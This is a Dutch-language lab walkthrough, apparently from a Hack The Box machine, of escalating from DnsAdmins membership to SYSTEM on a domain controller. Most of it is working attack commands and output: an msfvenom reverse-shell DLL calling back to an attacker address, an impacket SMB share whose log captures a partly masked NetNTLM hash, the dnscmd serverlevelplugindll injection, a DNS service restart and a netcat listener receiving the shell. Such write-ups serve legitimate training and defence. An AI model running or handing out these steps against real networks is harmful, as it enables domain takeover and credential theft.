dns-admin-to-dc-compromise

1. De lijstgebruiker die een DNS-beheerder is

net  localgroup  dnsadmins / domain
import - module  activedirectory
get - adgroupmember - Identity "DNSAdmins"

Configuratiescherm -> Programma’s en functies -> Windows-functies in- of uitschakelen -> Remote Server Administration Tools -> Role Administration Tools -> DNS Server Tools.

3. Maak kwaadaardige dll met Msfvenom

root@kali:~/htb/# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.70 LPORT=443 -f dll > /root/htb/rev.dll
root@kali:~/htb/# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,61299)
[*] AUTHENTICATE_MESSAGE (M******\R******$,R******)
[*] User R******\R******$ authenticated successfully
[*] R*******::M******:4141414141414141:df242de6e3900faf03e3c66ad44fcf9a:010100000000000080dc8fe768b9d5011264a1bcc0540eab0000-knip-0000000
[*] Disconnecting Share(1:SHARE)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,61299)
[*] Remaining connections []

5. Voer dll uit op een AD-machine met de opdracht dnscmd die is ingeschakeld in DNS Server.

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.10.16.70\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

6. Start de DNS-service opnieuw

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns 
TYPE : 10 WIN32_OWN_PROCESS 
STATE : 3 STOP_PENDING 
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns 
TYPE : 10 WIN32_OWN_PROCESS 
STATE : 2 START_PENDING 
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2164
FLAGS

7. Krijgt de verbinding met Netcat luisteraar waar we direct naar luisteren vanaf de AD-server. De sessie wordt ook een SYSTEEM-gebruiker (omdat dns.exe wordt uitgevoerd met SYSTEEM-privileges)

root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.169] 61300
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Auteur : Jacco Straathof